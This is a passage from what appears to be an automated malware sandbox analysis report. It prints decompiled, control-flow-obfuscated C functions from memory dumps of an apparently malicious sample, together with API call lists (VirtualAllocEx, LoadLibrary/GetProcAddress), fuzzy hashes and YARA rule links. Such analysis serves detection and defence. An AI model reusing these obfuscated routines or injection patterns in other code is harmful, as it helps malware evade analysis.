						 *((short*)(_t93 + 4)) = _t39;
						 *((intOrPtr*)(_t93 + 6)) = r11w;
						 *((intOrPtr*)(_t93 + 8)) = r14w;
						 *((intOrPtr*)(_t93 + 0xa)) = r9w;
						_t79 = 0xfcf21132;
						_t54 = 6;
						goto L1;
					}
					if(_t79 != 0xc14eec1f) {
						goto L1;
					}
					return _t39;
				}
				if(_t79 == 0xfcf21132) {
					_v52 = _t54;
					_t79 = 0x680d1e25;
					if(_v52 >= 0xc) {
						_t79 = 0x2d5dae;
					}
				} else {
					if(_t79 == 0x2d5dae) {
						 *((short*)(_t93 + 0x18)) = 0;
						_t79 = 0xc14eec1f;
					}
				}
				goto L1;
			}














                                                                                                                                                        0x012d5ef8
                                                                                                                                                        0x012d5ef8
                                                                                                                                                        0x012d5f05
                                                                                                                                                        0x012d5f0b
                                                                                                                                                        0x012d5f17
                                                                                                                                                        0x012d5f20
                                                                                                                                                        0x012d5f24
                                                                                                                                                        0x012d5f28
                                                                                                                                                        0x012d5f3a
                                                                                                                                                        0x012d5f44
                                                                                                                                                        0x012d5f66
                                                                                                                                                        0x012d5f6d
                                                                                                                                                        0x012d5f71
                                                                                                                                                        0x012d5f7c
                                                                                                                                                        0x012d5f99
                                                                                                                                                        0x012d5fa8
                                                                                                                                                        0x012d5fc4
                                                                                                                                                        0x012d5fc7
                                                                                                                                                        0x012d5fcb
                                                                                                                                                        0x012d5fdc
                                                                                                                                                        0x012d5fdf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d5fe4
                                                                                                                                                        0x012d5ff2
                                                                                                                                                        0x012d603b
                                                                                                                                                        0x012d60d6
                                                                                                                                                        0x012d60d8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d60d8
                                                                                                                                                        0x012d6047
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d605d
                                                                                                                                                        0x012d6069
                                                                                                                                                        0x012d6073
                                                                                                                                                        0x012d6077
                                                                                                                                                        0x012d6080
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d60a8
                                                                                                                                                        0x012d60a8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d60a8
                                                                                                                                                        0x012d5ffa
                                                                                                                                                        0x012d60a3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6000
                                                                                                                                                        0x012d6006
                                                                                                                                                        0x012d6008
                                                                                                                                                        0x012d6008
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6006
                                                                                                                                                        0x012d5ffa
                                                                                                                                                        0x012d6012
                                                                                                                                                        0x012d608e
                                                                                                                                                        0x012d60e2
                                                                                                                                                        0x012d60e6
                                                                                                                                                        0x012d60eb
                                                                                                                                                        0x012d60ef
                                                                                                                                                        0x012d60f4
                                                                                                                                                        0x012d60f9
                                                                                                                                                        0x012d60fe
                                                                                                                                                        0x012d6103
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6103
                                                                                                                                                        0x012d6096
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6096
                                                                                                                                                        0x012d601a
                                                                                                                                                        0x012d60b2
                                                                                                                                                        0x012d60ba
                                                                                                                                                        0x012d60c2
                                                                                                                                                        0x012d60c8
                                                                                                                                                        0x012d60c8
                                                                                                                                                        0x012d6020
                                                                                                                                                        0x012d6026
                                                                                                                                                        0x012d6028
                                                                                                                                                        0x012d602e
                                                                                                                                                        0x012d602e
                                                                                                                                                        0x012d6026
                                                                                                                                                        0x00000000

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 1785a3bfa312d7ea738652718749a4eb7fabe55dc42a4d3fe762d1321f48571a
                                                                                                                                                        • Instruction ID: efe9c617e6c1480282edc89152d481313db460f367edec22a1090539c7adb4af
                                                                                                                                                        • Opcode Fuzzy Hash: 1785a3bfa312d7ea738652718749a4eb7fabe55dc42a4d3fe762d1321f48571a
                                                                                                                                                        • Instruction Fuzzy Hash: 87417A23A747994BDB209E2CDCC966CB625F744704F458237EF091BB61E27ADC56C341
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B2254, Relevance: .1, Instructions: 135COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c39a44a4173a69d3fee20e1997022f0a8537250aab674fb30da883cafcf612e1
                                                                                                                                                        • Instruction ID: 32a4503e75e2008cadbf78568b39c402fff2291f718a42620bcbc8f6b80a5f86
                                                                                                                                                        • Opcode Fuzzy Hash: c39a44a4173a69d3fee20e1997022f0a8537250aab674fb30da883cafcf612e1
                                                                                                                                                        • Instruction Fuzzy Hash: 8441C2A2714F44C2EF04CF6ADA241A9B391AB48FD8B499436DE1D97B68EE3CD4468300
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012DC6ED, Relevance: .1, Instructions: 119COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E012DC6ED(void* __edx, void* __rcx) {
				unsigned int _v64;
				signed int _v68;
				signed int _v69;
				signed int _t14;
				void* _t16;
				signed int _t21;
				void* _t23;
				void* _t40;
				signed long long _t41;
				signed long long _t46;
				signed long long _t60;

				_t40 = __rcx;
				r10d = 0xda21fb16;
				r10d =  ==  ? 0x6c390ecc : r10d;
				_t16 = 0xe53688fb;
				r11d = 0xfefa82f5;
				r14d = 0x6dc6a198;
				while(1) {
					_t23 = _t16;
					if(_t16 <= 0x8041cb5) {
					}
					L2:
					if(_t23 <= 0xda21fb15) {
						if(_t23 == 0x871ca69d) {
							_v68 = _t21;
							_v64 = _t60;
							_t16 =  <  ? r11d : 0xb2d235b5;
							continue;
						}
						_t16 = _t23;
						if(_t23 != 0xb2d235b5) {
							continue;
						}
						L14:
						_t16 = 0x8041cb6;
						continue;
					} else {
						if(_t23 == 0xda21fb16) {
							_t16 = 0x871ca69d;
							_t21 = 0;
							r12d = 0;
						} else {
							_t16 = r10d;
							if(_t23 != 0xe53688fb) {
								_t16 = _t23;
								if(_t23 == 0xfefa82f5) {
									_t14 =  *((intOrPtr*)(_t40 + _t41));
									_v69 = _t14;
									_t16 =  ==  ? r14d : 0x2aec945f;
								}
							}
						}
						while(1) {
							_t23 = _t16;
							if(_t16 <= 0x8041cb5) {
							}
							goto L7;
						}
						goto L2;
					}
					L7:
					if(_t23 <= 0x5c54db9f) {
						if(_t23 == 0x8041cb6) {
							_t16 = 0x5c54dba0;
						} else {
							_t16 = _t23;
							if(_t23 == 0x2aec945f) {
								_t14 = _t14 & _t21;
								_t46 = _v69;
								_t41 = (_t46 ^ 0xffffffff) & 0xb727c88f;
								_t60 = (0x5e616a6d48d83770 & _t46 | _t41) ^ (((0xecd789b245319369 & _v64 << 0x00000007 | (_v64 << 0x00000007 ^ 0xffffffff) & 0xbace6c96) ^ (_v64 >> 0x00000039 | (_v64 >> 0x00000039 ^ 0xffffffff) & 0xbace6c96)) & 0x5e616a6d48d83770 | ((0xecd789b245319369 & _v64 << 0x00000007 | (_v64 << 0x00000007 ^ 0xffffffff) & 0xbace6c96) ^ (_v64 >> 0x00000039 | (_v64 >> 0x00000039 ^ 0xffffffff) & 0xbace6c96) ^ 0xffffffff) & 0xb727c88f);
								_t21 = _v68 + 1;
								_t16 = 0x871ca69d;
							}
						}
						continue;
					}
					if(_t23 == 0x6c390ecc) {
						_t16 = 0x5c54dba0;
						continue;
					}
					if(_t23 == 0x6dc6a198) {
						goto L14;
					}
					_t16 = _t23;
					if(_t23 != 0x5c54dba0) {
						continue;
					}
					return 0x6c390ecc;
				}
			}














                                                                                                                                                        0x012dc6ed
                                                                                                                                                        0x012dc717
                                                                                                                                                        0x012dc71d
                                                                                                                                                        0x012dc721
                                                                                                                                                        0x012dc726
                                                                                                                                                        0x012dc72c
                                                                                                                                                        0x012dc739
                                                                                                                                                        0x012dc739
                                                                                                                                                        0x012dc741
                                                                                                                                                        0x012dc741
                                                                                                                                                        0x012dc743
                                                                                                                                                        0x012dc749
                                                                                                                                                        0x012dc7b8
                                                                                                                                                        0x012dc87f
                                                                                                                                                        0x012dc883
                                                                                                                                                        0x012dc893
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dc893
                                                                                                                                                        0x012dc7be
                                                                                                                                                        0x012dc7c6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dc7cc
                                                                                                                                                        0x012dc7cc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dc74b
                                                                                                                                                        0x012dc751
                                                                                                                                                        0x012dc85f
                                                                                                                                                        0x012dc864
                                                                                                                                                        0x012dc866
                                                                                                                                                        0x012dc757
                                                                                                                                                        0x012dc757
                                                                                                                                                        0x012dc760
                                                                                                                                                        0x012dc762
                                                                                                                                                        0x012dc76a
                                                                                                                                                        0x012dc770
                                                                                                                                                        0x012dc773
                                                                                                                                                        0x012dc781
                                                                                                                                                        0x012dc781
                                                                                                                                                        0x012dc76a
                                                                                                                                                        0x012dc760
                                                                                                                                                        0x012dc739
                                                                                                                                                        0x012dc739
                                                                                                                                                        0x012dc741
                                                                                                                                                        0x012dc741
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dc741
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dc739
                                                                                                                                                        0x012dc787
                                                                                                                                                        0x012dc78d
                                                                                                                                                        0x012dc7dc
                                                                                                                                                        0x012dc89c
                                                                                                                                                        0x012dc7e2
                                                                                                                                                        0x012dc7e2
                                                                                                                                                        0x012dc7ea
                                                                                                                                                        0x012dc80e
                                                                                                                                                        0x012dc825
                                                                                                                                                        0x012dc846
                                                                                                                                                        0x012dc84c
                                                                                                                                                        0x012dc853
                                                                                                                                                        0x012dc855
                                                                                                                                                        0x012dc855
                                                                                                                                                        0x012dc7ea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dc7dc
                                                                                                                                                        0x012dc795
                                                                                                                                                        0x012dc86e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dc873
                                                                                                                                                        0x012dc7a1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dc7a3
                                                                                                                                                        0x012dc7ab
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dc7ab

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b6f9199f083e1daaf0e3c69b9a5d6d83a7f233b964514584192e343f59009c5f
                                                                                                                                                        • Instruction ID: 974db1a26325e790832c40ad2af41f0552221f68283939a7ef6500d831601608
                                                                                                                                                        • Opcode Fuzzy Hash: b6f9199f083e1daaf0e3c69b9a5d6d83a7f233b964514584192e343f59009c5f
                                                                                                                                                        • Instruction Fuzzy Hash: 4B31BB237B96B4827616698DE7D1135B44353C4BB0F0E462A9FB50BF85D634DCA3C780
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B8940, Relevance: .0, Instructions: 32COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 622250e1e27cb04b9f7c746084a1a8d49033a0c154415217e5c287e768fb447f
                                                                                                                                                        • Instruction ID: a666f93a2a1f27bd0d5c6764c2da32eee92a946019973f0d5099a1b5fc6c3285
                                                                                                                                                        • Opcode Fuzzy Hash: 622250e1e27cb04b9f7c746084a1a8d49033a0c154415217e5c287e768fb447f
                                                                                                                                                        • Instruction Fuzzy Hash: 39F06872B18795CEEB999FACA85363977E0F748384F90803AE68D83F14D63C95618F05
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696AA6E2, Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 366memoryfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocCreateCriticalDataDeleteObjectSectionVirtual$DragFileFillForwardingFunction24PathProxyQuery
                                                                                                                                                        • String ID: ,B5$V0TS$m<"$ ':$){9$;5
                                                                                                                                                        • API String ID: 1669154849-3716636575
                                                                                                                                                        • Opcode ID: d767a1c3514e41475dd5771f859cf10b76e2ae99794591a677f2180ef5924df1
                                                                                                                                                        • Instruction ID: cba3273a72815b579e60db1d585823403e4d8e79a14c45f0e53850a60dc389e4
                                                                                                                                                        • Opcode Fuzzy Hash: d767a1c3514e41475dd5771f859cf10b76e2ae99794591a677f2180ef5924df1
                                                                                                                                                        • Instruction Fuzzy Hash: 96125B32618B80CBD760CF55F49475ABBA1F7847A8F508229EAD94BB98CB7CE545CF00
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696AC7C3, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 299pipetimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: TimeUser$ApplicationCriticalDateDeleteFileFillFormatFreeKeyboardLayoutModelNameNamedParentPathPipeScaleSectionViewportWait
                                                                                                                                                        • String ID: #0?2$c8[
                                                                                                                                                        • API String ID: 2545732139-3625505682
                                                                                                                                                        • Opcode ID: f510ed20618d1bfc375401857be8d34d429b7f882260b6d2ec441618ce5c6eb8
                                                                                                                                                        • Instruction ID: 2b35cfb2dfc757741328fc98247069f132150fad258342a3aec0bff974ddf127
                                                                                                                                                        • Opcode Fuzzy Hash: f510ed20618d1bfc375401857be8d34d429b7f882260b6d2ec441618ce5c6eb8
                                                                                                                                                        • Instruction Fuzzy Hash: 51E15B76608B85CBD760CF56E49065EB7A0F788B98F508125EB8A87B58DF7CE844CF01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696AE458, Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 233libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: gC+$gC+$gC+$,EG$,EG$,EG$,EG
                                                                                                                                                        • API String ID: 2574300362-2682763454
                                                                                                                                                        • Opcode ID: 633c4231678a309b0db299ba4637ef89f729a0e47cf9d2c7c8ef301b7c23958e
                                                                                                                                                        • Instruction ID: 81b05dbb89925e53887baef31889e8a18c1480d5e0ee93a980deccd406839f0c
                                                                                                                                                        • Opcode Fuzzy Hash: 633c4231678a309b0db299ba4637ef89f729a0e47cf9d2c7c8ef301b7c23958e
                                                                                                                                                        • Instruction Fuzzy Hash: F8A1DA71B0CB42C7EA658F45A49423D67A0FB89758F640436EA4DC7B64DE3DDC418B42
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696A720B, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 204COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ILIsParent.SHELL32 ref: 00007FFD696A7287
                                                                                                                                                        • GetKeyboardLayoutNameW.USER32 ref: 00007FFD696A7295
                                                                                                                                                          • Part of subcall function 00007FFD696AA6E2: VirtualAllocEx.KERNEL32 ref: 00007FFD696AA7A2
                                                                                                                                                          • Part of subcall function 00007FFD696AA6E2: VirtualAllocEx.KERNEL32 ref: 00007FFD696AA7C4
                                                                                                                                                          • Part of subcall function 00007FFD696AA6E2: NdrProxyForwardingFunction24.OLE32 ref: 00007FFD696AA7C8
                                                                                                                                                          • Part of subcall function 00007FFD696AA6E2: SHCreateDataObject.SHELL32 ref: 00007FFD696AA80B
                                                                                                                                                          • Part of subcall function 00007FFD696AA6E2: DeleteCriticalSection.KERNEL32 ref: 00007FFD696AA852
                                                                                                                                                          • Part of subcall function 00007FFD696AA6E2: DeleteCriticalSection.KERNEL32 ref: 00007FFD696AA86C
                                                                                                                                                          • Part of subcall function 00007FFD696AA6E2: FillPath.GDI32 ref: 00007FFD696AA87B
                                                                                                                                                          • Part of subcall function 00007FFD696AA6E2: DragQueryFileA.SHELL32 ref: 00007FFD696AA8AC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocCriticalDeleteSectionVirtual$CreateDataDragFileFillForwardingFunction24KeyboardLayoutNameObjectParentPathProxyQuery
                                                                                                                                                        • String ID: 6b}$k?*$H})$w^8
                                                                                                                                                        • API String ID: 1670229418-1564879513
                                                                                                                                                        • Opcode ID: 5781592db3bc12a96afa827a6fbdf83ac16cbf254b3456f861c8b4586d9092b0
                                                                                                                                                        • Instruction ID: 9cecf16573211810a310bd7a5b6e48daf722b3a1ed7f05c1f7cb65e4f5f043d5
                                                                                                                                                        • Opcode Fuzzy Hash: 5781592db3bc12a96afa827a6fbdf83ac16cbf254b3456f861c8b4586d9092b0
                                                                                                                                                        • Instruction Fuzzy Hash: 82A17C72A18B41CBD360CF55E49066EBBA1F785B88F504129FA8987B69DF3CE841CF41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B8CC8, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                        • Opcode ID: 02af9ad2b0fd002461e5c157a0f019038a4e0719372ed9688368c2cf76679503
                                                                                                                                                        • Instruction ID: ae16b9a2032d64e90fd8840ba48b47289565ebcc272a9d1454bc8c4d355ebe42
                                                                                                                                                        • Opcode Fuzzy Hash: 02af9ad2b0fd002461e5c157a0f019038a4e0719372ed9688368c2cf76679503
                                                                                                                                                        • Instruction Fuzzy Hash: B7118E61B18F42C6E3509F92E86432963E0FB98FE8F000235EA1D877A8EF3CD4148705
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B1B7C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                        • Opcode ID: 832bc00e9a9bc3dc5ae1e5259b11d54da47f40ad0b32d3a33f9fcc3db9db21e7
                                                                                                                                                        • Instruction ID: fa716afd876c4bd1f21d2b8b752b0eb148d571b5366a4675abcfbdc55e75d283
                                                                                                                                                        • Opcode Fuzzy Hash: 832bc00e9a9bc3dc5ae1e5259b11d54da47f40ad0b32d3a33f9fcc3db9db21e7
                                                                                                                                                        • Instruction Fuzzy Hash: 3EF05EA1B19F42D1EB549FA0E4B037423A0AF84B58F441439D94F862A8FF7CE4A9C302
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B7548, Relevance: 7.7, APIs: 5, Instructions: 170fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 977765425-0
                                                                                                                                                        • Opcode ID: 862a4ac024a5d4ae73fd49c1dba910d903e3926207fd369327c34420e6648c7b
                                                                                                                                                        • Instruction ID: b166df684eaa369765bab461588ea025082766dce49211b3134d09055a58a7bb
                                                                                                                                                        • Opcode Fuzzy Hash: 862a4ac024a5d4ae73fd49c1dba910d903e3926207fd369327c34420e6648c7b
                                                                                                                                                        • Instruction Fuzzy Hash: 5361B1A3B18F91C9EB108FA9E9501AD3BB1B748B9CB044135DE4E47B99EE38D166C701
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B875C, Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                        • Opcode ID: f0ff068221746e3eeed817233f03df1aa1f424e171c507deac8e1276b21e13ad
                                                                                                                                                        • Instruction ID: f5fb05a34f86afad914c06fafc7f026f8719fc207918fea1b99061ea52ee0949
                                                                                                                                                        • Opcode Fuzzy Hash: f0ff068221746e3eeed817233f03df1aa1f424e171c507deac8e1276b21e13ad
